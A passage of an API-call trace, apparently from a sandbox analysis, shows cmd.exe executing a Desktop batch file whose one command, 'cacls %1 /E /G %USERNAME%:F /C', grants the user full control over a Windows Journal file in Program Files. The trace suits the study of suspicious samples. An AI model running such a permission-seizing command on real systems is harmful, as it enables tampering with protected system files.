(_String1="\"C", _String2="CD") returned -65 [0247.829] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0247.829] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0247.829] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0247.829] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0247.829] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0247.829] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0247.829] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0247.829] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0247.829] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0247.829] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0247.829] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0247.829] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0247.829] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0247.829] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0247.829] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0247.829] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0247.829] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0247.829] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0247.829] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0247.830] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0247.830] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0247.830] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0247.830] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0247.830] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0247.830] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0247.830] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0247.830] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0247.830] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0247.830] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0247.830] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0247.830] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0247.830] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0247.830] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0247.830] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0247.830] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0247.830] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0247.830] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0247.830] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0247.830] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0247.830] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0247.830] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0247.830] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0247.830] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0247.831] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0247.831] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0247.831] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0247.831] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0247.831] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0247.831] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0247.831] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0247.831] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0247.831] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0247.831] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0247.831] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0247.831] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0247.831] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0247.831] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0247.831] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0247.831] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0247.831] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0247.831] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0247.831] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0247.832] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0247.832] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0247.832] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0247.832] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0247.832] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0247.832] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0247.832] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0247.832] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0247.832] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0247.832] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0247.832] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0247.832] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0247.832] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0247.832] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0247.832] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0247.832] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0247.832] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0247.832] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0247.832] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0247.832] GetProcessHeap () returned 0x680000 [0247.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x210) returned 0x6951c0 [0247.832] GetProcessHeap () returned 0x680000 [0247.832] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xe6) returned 0x6953d8 [0247.944] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0247.945] GetProcessHeap () returned 0x680000 [0247.945] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x418) returned 0x6807f0 [0247.945] SetErrorMode (uMode=0x0) returned 0x0 [0247.945] SetErrorMode (uMode=0x1) returned 0x0 [0247.945] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x6807f8, lpFilePart=0x2bf0f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2bf0f0*="Desktop") returned 0x25 [0247.945] SetErrorMode (uMode=0x0) returned 0x1 [0247.945] GetProcessHeap () returned 0x680000 [0247.945] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6807f0, Size=0x6e) returned 0x6807f0 [0247.945] GetProcessHeap () returned 0x680000 [0247.945] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6807f0) returned 0x6e [0247.945] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0247.945] GetProcessHeap () returned 0x680000 [0247.945] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x5a) returned 0x6954c8 [0247.946] GetProcessHeap () returned 0x680000 [0247.946] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xa8) returned 0x695530 [0247.946] GetProcessHeap () returned 0x680000 [0247.946] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x695530, Size=0x5a) returned 0x695530 [0247.946] GetProcessHeap () returned 0x680000 [0247.946] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x695530) returned 0x5a [0247.946] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0247.946] GetProcessHeap () returned 0x680000 [0247.946] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xe0) returned 0x680868 [0247.950] GetProcessHeap () returned 0x680000 [0247.950] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x680868, Size=0x76) returned 0x680868 [0247.950] GetProcessHeap () returned 0x680000 [0247.950] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x680868) returned 0x76 [0247.951] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0247.951] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x2bee8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee8c) returned 0x695598 [0247.951] GetProcessHeap () returned 0x680000 [0247.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x6955d8 [0247.951] FindClose (in: hFindFile=0x695598 | out: hFindFile=0x695598) returned 1 [0247.951] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0247.951] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0247.951] GetConsoleTitleW (in: lpConsoleTitle=0x2bf364, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0247.951] GetProcessHeap () returned 0x680000 [0247.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x11c) returned 0x6808e8 [0247.952] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0247.952] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0247.952] IdentifyCodeAuthzLevelW () returned 0x1 [0247.959] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0247.959] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0247.960] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0247.960] CloseCodeAuthzLevel () returned 0x1 [0247.960] SetErrorMode (uMode=0x0) returned 0x0 [0247.960] SetErrorMode (uMode=0x1) returned 0x0 [0247.960] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x6951c8, lpFilePart=0x2bf250 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x2bf250*="Ch81ANBE.bat") returned 0x32 [0247.960] SetErrorMode (uMode=0x0) returned 0x1 [0247.960] GetProcessHeap () returned 0x680000 [0247.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x72) returned 0x690f68 [0247.960] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui\"", _Control=" \x09") returned 0x1 [0247.960] GetProcessHeap () returned 0x680000 [0247.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x7a) returned 0x6811b8 [0247.960] GetProcessHeap () returned 0x680000 [0247.960] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xec) returned 0x6960f8 [0247.960] GetProcessHeap () returned 0x680000 [0247.960] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6960f8, Size=0x7c) returned 0x6960f8 [0247.960] GetProcessHeap () returned 0x680000 [0247.960] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6960f8) returned 0x7c [0247.961] CmdBatNotification () returned 0x69522a [0247.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2bf294, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0247.961] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0247.962] _get_osfhandle (_FileHandle=3) returned 0x78 [0247.962] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0247.962] _get_osfhandle (_FileHandle=3) returned 0x78 [0247.962] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0247.962] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2bf278, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2bf278*=0xe2, lpOverlapped=0x0) returned 1 [0247.963] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0247.963] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0247.964] _get_osfhandle (_FileHandle=3) returned 0x78 [0247.964] GetFileType (hFile=0x78) returned 0x1 [0247.964] _get_osfhandle (_FileHandle=3) returned 0x78 [0247.964] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0247.964] GetProcessHeap () returned 0x680000 [0247.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x400a) returned 0x698a78 [0247.964] GetProcessHeap () returned 0x680000 [0247.964] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4008) returned 0x6a4ab0 [0247.965] GetProcessHeap () returned 0x680000 [0247.965] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1a) returned 0x6977c8 [0247.965] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0247.965] GetProcessHeap () returned 0x680000 [0247.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6977c8 | out: hHeap=0x680000) returned 1 [0247.965] GetProcessHeap () returned 0x680000 [0247.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a4ab0 | out: hHeap=0x680000) returned 1 [0247.965] GetProcessHeap () returned 0x680000 [0247.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x698a78 | out: hHeap=0x680000) returned 1 [0247.966] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0247.966] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0247.966] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0247.966] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0247.966] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0247.966] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0247.966] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0247.966] GetProcessHeap () returned 0x680000 [0247.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x58) returned 0x681240 [0247.966] GetProcessHeap () returned 0x680000 [0247.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x14) returned 0x6812a0 [0247.969] GetProcessHeap () returned 0x680000 [0247.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xbc) returned 0x696180 [0247.970] _tell (_FileHandle=3) returned 32 [0247.970] _close (_FileHandle=3) returned 0 [0247.970] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2bf04c | out: _Buffer="\r\n") returned 2 [0247.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.971] GetFileType (hFile=0x7) returned 0x2 [0247.971] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.971] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2bf00c | out: lpMode=0x2bf00c) returned 1 [0247.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.972] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2bf038, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2bf038*=0x2) returned 1 [0247.972] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0247.972] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0247.972] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2bf048 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0247.972] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2bf048 | out: _Buffer=">") returned 1 [0247.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.972] GetFileType (hFile=0x7) returned 0x2 [0247.973] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.973] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2bf010 | out: lpMode=0x2bf010) returned 1 [0247.973] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.973] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2bf03c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2bf03c*=0x26) returned 1 [0247.974] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.974] GetFileType (hFile=0x7) returned 0x2 [0247.975] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.975] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2bf294 | out: lpMode=0x2bf294) returned 1 [0247.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.975] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x6812a8*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2bf2c0, lpReserved=0x0 | out: lpBuffer=0x6812a8*, lpNumberOfCharsWritten=0x2bf2c0*=0x5) returned 1 [0247.976] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2bf2cc | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 90 [0247.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.976] GetFileType (hFile=0x7) returned 0x2 [0247.976] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.976] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2bf28c | out: lpMode=0x2bf28c) returned 1 [0247.977] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.977] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x5a, lpNumberOfCharsWritten=0x2bf2b8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2bf2b8*=0x5a) returned 1 [0247.977] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2bf2ec | out: _Buffer="\r\n") returned 2 [0247.977] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.977] GetFileType (hFile=0x7) returned 0x2 [0247.978] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0247.978] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2bf2ac | out: lpMode=0x2bf2ac) returned 1 [0247.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0247.978] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2bf2d8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2bf2d8*=0x2) returned 1 [0247.978] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0247.979] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0247.979] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0247.979] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0247.979] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0247.979] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0247.979] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0247.979] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0247.979] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0247.979] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0247.979] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0247.979] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0247.979] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0247.979] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0247.979] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0247.979] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0247.979] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0247.979] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0247.979] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0247.979] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0247.979] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0247.979] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0247.979] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0247.979] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0247.979] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0247.980] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0247.980] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0247.980] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0247.980] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0247.980] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0247.980] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0247.980] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0247.980] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0247.980] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0247.980] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0247.980] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0247.980] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0247.980] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0247.980] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0247.980] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0247.980] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0247.980] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0247.980] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0247.981] GetProcessHeap () returned 0x680000 [0247.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x418) returned 0x696248 [0247.981] SetErrorMode (uMode=0x0) returned 0x0 [0247.981] SetErrorMode (uMode=0x1) returned 0x0 [0247.981] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x696250, lpFilePart=0x2bf090 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2bf090*="Desktop") returned 0x25 [0247.981] SetErrorMode (uMode=0x0) returned 0x1 [0247.981] GetProcessHeap () returned 0x680000 [0247.981] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696248, Size=0x60) returned 0x696248 [0247.981] GetProcessHeap () returned 0x680000 [0247.981] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x696248) returned 0x60 [0247.981] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0247.981] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0247.981] GetProcessHeap () returned 0x680000 [0247.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x120) returned 0x6962b0 [0247.981] GetProcessHeap () returned 0x680000 [0247.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x238) returned 0x6963d8 [0247.984] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0247.985] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2bee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee0c) returned 0xffffffff [0247.985] GetLastError () returned 0x2 [0247.985] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x2bee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee0c) returned 0xffffffff [0247.986] GetLastError () returned 0x2 [0247.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0247.986] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2bee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee0c) returned 0x696588 [0247.986] GetProcessHeap () returned 0x680000 [0247.986] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6955d8, Size=0x4) returned 0x6955d8 [0247.986] FindClose (in: hFindFile=0x696588 | out: hFindFile=0x696588) returned 1 [0247.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2bee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee0c) returned 0xffffffff [0247.987] GetLastError () returned 0x2 [0247.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2bee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bee0c) returned 0x696588 [0247.987] FindClose (in: hFindFile=0x696588 | out: hFindFile=0x696588) returned 1 [0247.988] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0247.988] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0247.988] GetConsoleTitleW (in: lpConsoleTitle=0x2bee5c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0248.119] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x696878, lpFilePart=0x2be97c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2be97c*="Desktop") returned 0x25 [0248.119] SetErrorMode (uMode=0x0) returned 0x1 [0248.119] GetProcessHeap () returned 0x680000 [0248.119] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x696870, Size=0x60) returned 0x696870 [0248.119] GetProcessHeap () returned 0x680000 [0248.119] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x696870) returned 0x60 [0248.119] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0248.119] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0248.120] GetProcessHeap () returned 0x680000 [0248.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x120) returned 0x6968d8 [0248.120] GetProcessHeap () returned 0x680000 [0248.120] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x238) returned 0x696a00 [0248.120] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0248.120] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x2be6f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2be6f8) returned 0xffffffff [0248.121] GetLastError () returned 0x2 [0248.121] FindFirstFileExW (in: 